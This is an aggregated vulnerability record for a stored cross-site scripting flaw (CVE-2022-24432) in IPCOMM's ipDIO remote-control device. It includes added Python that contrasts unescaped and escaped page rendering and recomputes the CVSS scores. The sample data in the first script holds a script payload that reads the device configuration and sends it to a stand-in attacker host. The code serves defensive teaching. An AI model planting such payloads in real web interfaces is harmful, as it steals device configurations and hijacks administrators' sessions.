ID

VAR-202203-0225


CVE

CVE-2022-24432


TITLE

IPCOMM ipDIO Cross-Site Scripting Vulnerability

Trust: 1.2

sources: CNVD: CNVD-2022-20536 // CNNVD: CNNVD-202203-184

DESCRIPTION

Persistent cross-site scripting (XSS) in the web interface of ipDIO allows an authenticated remote attacker to introduce arbitrary JavaScript by injecting an XSS payload into specific fields. The XSS payload will be executed when a legitimate user attempts to upload, copy, download, or delete an existing configuration (Administrative Services). Because the payload is stored on the device, it runs in the browser of whichever user later performs one of those actions, with that user's session and privileges. ipDIO contains a cross-site scripting vulnerability; information may be obtained and information may be tampered with. IPCOMM ipDIO is a remote-control communication device made by the German company IPCOMM; it is used to record digital and analog inputs and to control digital outputs.

Trust: 2.16

sources: NVD: CVE-2022-24432 // JVNDB: JVNDB-2021-011016 // CNVD: CNVD-2022-20536
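The following Python is an added illustration of the stored-XSS pattern described above and is not code from IPCOMM or from any of the listed sources. The advisory only says "specific fields"; the example assumes, as a hypothetical, that a stored configuration name is one such field, and models the administrative list page that offers the upload/copy/download/delete actions. It shows the unescaped rendering beside a hardened version that escapes on output and rejects bad names on input, plus a crude regression check a tester can run against the served page. The stored names and the payload are constructed sample data.

```python
import html
import re
from urllib.parse import quote

# Constructed sample of stored configuration names as they might sit on the
# device after an authenticated user saved them. The field ("configuration
# name") and the payload are assumptions for illustration only.
STORED_CONFIG_NAMES = [
    "default",
    "backup_2022-03",
    '<script>fetch("/config/default").then(r=>r.text())'
    '.then(t=>fetch("http://attacker.example/?c="+encodeURIComponent(t)))</script>',
]

# Administrative Services actions named in the advisory.
ACTIONS = ("upload", "copy", "download", "delete")


def render_config_list_vulnerable(names):
    """Vulnerable pattern: stored values concatenated into HTML unescaped.
    Whoever opens this page next (typically an administrator) runs the
    attacker's script with their own session."""
    rows = []
    for name in names:
        links = " ".join(f'<a href="/admin/{a}?name={name}">{a}</a>' for a in ACTIONS)
        rows.append(f"<tr><td>{name}</td><td>{links}</td></tr>")
    return "<table>" + "".join(rows) + "</table>"


def render_config_list_safe(names):
    """Hardened: HTML-escape each stored value where it enters element text
    and percent-encode it where it enters a URL query; the two contexts need
    different encoders."""
    rows = []
    for name in names:
        safe_text = html.escape(name, quote=True)      # <, >, &, ", '
        safe_query = quote(name, safe="")              # everything but A-Za-z0-9_.-~
        links = " ".join(
            f'<a href="/admin/{a}?name={safe_query}">{a}</a>' for a in ACTIONS
        )
        rows.append(f"<tr><td>{safe_text}</td><td>{links}</td></tr>")
    return "<table>" + "".join(rows) + "</table>"


# Allow-list for names at save time (hypothetical policy for this example).
CONFIG_NAME_RE = re.compile(r"[A-Za-z0-9_.-]{1,64}")


def validate_config_name(name):
    """Defence in depth: refuse to store anything outside the allow-list, so a
    payload never reaches the page even if some output path forgets to escape."""
    return CONFIG_NAME_RE.fullmatch(name) is not None


def contains_active_markup(rendered_html):
    """Crude check for a fix regression test: does a literal <script tag survive
    in the served page? Escaped (&lt;script) or percent-encoded (%3Cscript)
    forms do not match."""
    return re.search(r"<script\b", rendered_html, re.IGNORECASE) is not None


if __name__ == "__main__":
    print("vulnerable page executes payload:",
          contains_active_markup(render_config_list_vulnerable(STORED_CONFIG_NAMES)))
    print("hardened page executes payload:  ",
          contains_active_markup(render_config_list_safe(STORED_CONFIG_NAMES)))
    for n in STORED_CONFIG_NAMES:
        print(f"accept at save time? {validate_config_name(n)!s:5}  {n[:40]!r}")
```

Output encoding is the actual fix; the allow-list only limits what can be stored and would not help if legitimate names must contain characters like `<` or `"`.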

IOT TAXONOMY

category: IoT
sub_category: -

Trust: 0.6

sources: CNVD: CNVD-2022-20536

AFFECTED PRODUCTS

vendor: ipcomm | model: ipdio | scope: eq | version: 3.9

Trust: 1.6

vendor: ipcomm | model: ipdio | scope: - | version: -

Trust: 0.8

vendor: ipcomm | model: ipdio | scope: eq | version: -

Trust: 0.8

vendor: ipcomm | model: ipdio | scope: eq | version: ipdio firmware

Trust: 0.8

sources: CNVD: CNVD-2022-20536 // JVNDB: JVNDB-2021-011016 // NVD: CVE-2022-24432

CVSS

SEVERITY

CVSSV2

CVSSV3

nvd@nist.gov: CVE-2022-24432
value: MEDIUM

Trust: 1.0

ics-cert@hq.dhs.gov: CVE-2022-24432
value: MEDIUM

Trust: 1.0

NVD: CVE-2022-24432
value: MEDIUM

Trust: 0.8

CNVD: CNVD-2022-20536
value: LOW

Trust: 0.6

CNNVD: CNNVD-202203-184
value: MEDIUM

Trust: 0.6

nvd@nist.gov: CVE-2022-24432
severity: LOW
baseScore: 3.5
vectorString: AV:N/AC:M/AU:S/C:N/I:P/A:N
accessVector: NETWORK
accessComplexity: MEDIUM
authentication: SINGLE
confidentialityImpact: NONE
integrityImpact: PARTIAL
availabilityImpact: NONE
exploitabilityScore: 6.8
impactScore: 2.9
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 1.8

CNVD: CNVD-2022-20536
severity: LOW
baseScore: 3.5
vectorString: AV:N/AC:M/AU:S/C:N/I:P/A:N
accessVector: NETWORK
accessComplexity: MEDIUM
authentication: SINGLE
confidentialityImpact: NONE
integrityImpact: PARTIAL
availabilityImpact: NONE
exploitabilityScore: 6.8
impactScore: 2.9
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.6

nvd@nist.gov: CVE-2022-24432
baseSeverity: MEDIUM
baseScore: 5.4
vectorString: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
attackVector: NETWORK
attackComplexity: LOW
privilegesRequired: LOW
userInteraction: REQUIRED
scope: CHANGED
confidentialityImpact: LOW
integrityImpact: LOW
availabilityImpact: NONE
exploitabilityScore: 2.3
impactScore: 2.7
version: 3.1

Trust: 1.0

ics-cert@hq.dhs.gov: CVE-2022-24432
baseSeverity: MEDIUM
baseScore: 5.5
vectorString: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:L
attackVector: NETWORK
attackComplexity: LOW
privilegesRequired: LOW
userInteraction: REQUIRED
scope: UNCHANGED
confidentialityImpact: LOW
integrityImpact: LOW
availabilityImpact: LOW
exploitabilityScore: 2.1
impactScore: 3.4
version: 3.1

Trust: 1.0

NVD: CVE-2022-24432
baseSeverity: MEDIUM
baseScore: 5.4
vectorString: CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
attackVector: NETWORK
attackComplexity: LOW
privilegesRequired: LOW
userInteraction: REQUIRED
scope: CHANGED
confidentialityImpact: LOW
integrityImpact: LOW
availabilityImpact: NONE
exploitabilityScore: NONE
impactScore: NONE
version: 3.0

Trust: 0.8

sources: CNVD: CNVD-2022-20536 // JVNDB: JVNDB-2021-011016 // CNNVD: CNNVD-202203-184 // NVD: CVE-2022-24432
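The two CVSS v3.1 vectors above score 5.4 (NVD: scope changed, no availability impact) and 5.5 (ICS-CERT: scope unchanged, low availability impact), and the v2 vector scores 3.5. The following Python is an added worked example, not code from any of the listed sources, that implements the published CVSS v2 and v3.1 base-score equations and reproduces every base score and sub-score shown on this page from its vector string. It goes beyond the page in one respect: it handles any valid base vector, not just these three.

```python
import math

# CVSS v3.1 base metric weights (specification section 7.4).
_AV3 = {"N": 0.85, "A": 0.62, "L": 0.55, "P": 0.20}
_AC3 = {"L": 0.77, "H": 0.44}
_PR3_UNCHANGED = {"N": 0.85, "L": 0.62, "H": 0.27}
_PR3_CHANGED = {"N": 0.85, "L": 0.68, "H": 0.50}
_UI3 = {"N": 0.85, "R": 0.62}
_CIA3 = {"H": 0.56, "L": 0.22, "N": 0.0}

# CVSS v2 base metric weights (v2 guide, section 3.2.1).
_AV2 = {"L": 0.395, "A": 0.646, "N": 1.0}
_AC2 = {"H": 0.35, "M": 0.61, "L": 0.71}
_AU2 = {"M": 0.45, "S": 0.56, "N": 0.704}
_CIA2 = {"N": 0.0, "P": 0.275, "C": 0.660}


def _roundup31(value):
    """CVSS v3.1 Roundup: smallest one-decimal number >= value, computed on an
    integer scale so floating-point noise cannot push a score up a notch.
    (v3.0 used a plain ceiling; the two differ only in such edge cases.)"""
    int_input = round(value * 100000)
    if int_input % 10000 == 0:
        return int_input / 100000.0
    return (math.floor(int_input / 10000) + 1) / 10.0


def _parse(vector, required):
    prefix, _, rest = vector.partition("/")
    metrics = dict(part.split(":", 1) for part in rest.split("/"))
    missing = set(required) - metrics.keys()
    if missing:
        raise ValueError(f"vector {vector!r} missing base metrics {sorted(missing)}")
    return prefix, metrics


def cvss3_scores(vector):
    """Return (base_score, impact_subscore, exploitability_subscore) for a
    CVSS:3.0 or CVSS:3.1 vector, using the v3.1 equations."""
    prefix, m = _parse(vector, ("AV", "AC", "PR", "UI", "S", "C", "I", "A"))
    if prefix not in ("CVSS:3.0", "CVSS:3.1"):
        raise ValueError(f"unsupported prefix {prefix!r}")
    changed = m["S"] == "C"
    pr = (_PR3_CHANGED if changed else _PR3_UNCHANGED)[m["PR"]]
    iss = 1 - (1 - _CIA3[m["C"]]) * (1 - _CIA3[m["I"]]) * (1 - _CIA3[m["A"]])
    if changed:
        impact = 7.52 * (iss - 0.029) - 3.25 * (iss - 0.02) ** 15
    else:
        impact = 6.42 * iss
    exploitability = 8.22 * _AV3[m["AV"]] * _AC3[m["AC"]] * pr * _UI3[m["UI"]]
    if impact <= 0:
        base = 0.0
    elif changed:
        base = _roundup31(min(1.08 * (impact + exploitability), 10))
    else:
        base = _roundup31(min(impact + exploitability, 10))
    return base, round(impact, 1), round(exploitability, 1)


def cvss2_scores(vector):
    """Return (base_score, impact_subscore, exploitability_subscore) for a
    CVSS v2 vector such as AV:N/AC:M/AU:S/C:N/I:P/A:N (no prefix)."""
    _, m = _parse("v2/" + vector, ("AV", "AC", "AU", "C", "I", "A"))
    impact = 10.41 * (1 - (1 - _CIA2[m["C"]]) * (1 - _CIA2[m["I"]]) * (1 - _CIA2[m["A"]]))
    exploitability = 20 * _AV2[m["AV"]] * _AC2[m["AC"]] * _AU2[m["AU"]]
    f_impact = 0.0 if impact == 0 else 1.176
    base = round((0.6 * impact + 0.4 * exploitability - 1.5) * f_impact, 1)
    return base, round(impact, 1), round(exploitability, 1)


def severity_v3(base):
    """Qualitative rating per the v3.x specification (section 5)."""
    if base == 0.0:
        return "NONE"
    if base < 4.0:
        return "LOW"
    if base < 7.0:
        return "MEDIUM"
    if base < 9.0:
        return "HIGH"
    return "CRITICAL"


if __name__ == "__main__":
    for v in ("CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",   # NVD
              "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:L"):  # ICS-CERT
        base, imp, expl = cvss3_scores(v)
        print(f"{v}: base={base} ({severity_v3(base)}) impact={imp} exploitability={expl}")
    print("v2:", cvss2_scores("AV:N/AC:M/AU:S/C:N/I:P/A:N"))
```

The one-tenth difference between the two v3.1 scores is the net effect of NVD's scope-changed modifier (the 1.08 factor and the higher PR:L weight) against ICS-CERT's extra availability impact; either is defensible, which is why triage should key on the vector, not the rounded number.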

PROBLEMTYPE DATA

problemtype:CWE-79

Trust: 1.0

problemtype:Cross-site scripting (CWE-79) [NVD evaluation ]

Trust: 0.8

sources: JVNDB: JVNDB-2021-011016 // NVD: CVE-2022-24432

THREAT TYPE

remote

Trust: 0.6

sources: CNNVD: CNNVD-202203-184

TYPE

XSS

Trust: 0.6

sources: CNNVD: CNNVD-202203-184

PATCH

title: ipDIO | url: https://www.ipcomm.de/product/ipDIO/en/sheet.html

Trust: 0.8

title: Patch for IPCOMM ipDIO Cross-Site Scripting Vulnerability | url: https://www.cnvd.org.cn/patchInfo/show/326476

Trust: 0.6

title: IPCOMM ipDIO Fixes for cross-site scripting vulnerabilities | url: http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=184600

Trust: 0.6

sources: CNVD: CNVD-2022-20536 // JVNDB: JVNDB-2021-011016 // CNNVD: CNNVD-202203-184

EXTERNAL IDS

db: NVD | id: CVE-2022-24432

Trust: 3.8

db: ICS CERT | id: ICSA-22-062-01

Trust: 2.4

db: JVN | id: JVNVU91136750

Trust: 0.8

db: JVNDB | id: JVNDB-2021-011016

Trust: 0.8

db: CNVD | id: CNVD-2022-20536

Trust: 0.6

db: CS-HELP | id: SB2022030402

Trust: 0.6

db: CNNVD | id: CNNVD-202203-184

Trust: 0.6

sources: CNVD: CNVD-2022-20536 // JVNDB: JVNDB-2021-011016 // CNNVD: CNNVD-202203-184 // NVD: CVE-2022-24432

REFERENCES

url:https://www.cisa.gov/uscert/ics/advisories/icsa-22-062-01

Trust: 2.4

url:https://nvd.nist.gov/vuln/detail/cve-2022-24432

Trust: 1.4

url:https://jvn.jp/vu/jvnvu91136750/

Trust: 0.8

url:https://cxsecurity.com/cveshow/cve-2022-24432/

Trust: 0.6

url:https://us-cert.cisa.gov/ics/advisories/icsa-22-062-01

Trust: 0.6

url:https://www.cybersecurity-help.cz/vdb/sb2022030402

Trust: 0.6

sources: CNVD: CNVD-2022-20536 // JVNDB: JVNDB-2021-011016 // CNNVD: CNNVD-202203-184 // NVD: CVE-2022-24432

CREDITS

Aarón Flecha Menéndez of S21Sec reported this vulnerability to CISA (credited in ICSA-22-062-01).

Trust: 0.6

sources: CNNVD: CNNVD-202203-184

SOURCES

db: CNVD | id: CNVD-2022-20536
db: JVNDB | id: JVNDB-2021-011016
db: CNNVD | id: CNNVD-202203-184
db: NVD | id: CVE-2022-24432

LAST UPDATE DATE

2024-11-23T22:15:55.520000+00:00


SOURCES UPDATE DATE

db: CNVD | id: CNVD-2022-20536 | date: 2022-03-18T00:00:00
db: JVNDB | id: JVNDB-2021-011016 | date: 2022-07-14T07:36:00
db: CNNVD | id: CNNVD-202203-184 | date: 2022-03-17T00:00:00
db: NVD | id: CVE-2022-24432 | date: 2024-11-21T06:50:24.570

SOURCES RELEASE DATE

db: CNVD | id: CNVD-2022-20536 | date: 2022-03-17T00:00:00
db: JVNDB | id: JVNDB-2021-011016 | date: 2022-07-14T00:00:00
db: CNNVD | id: CNNVD-202203-184 | date: 2022-03-03T00:00:00
db: NVD | id: CVE-2022-24432 | date: 2022-03-10T17:46:13.957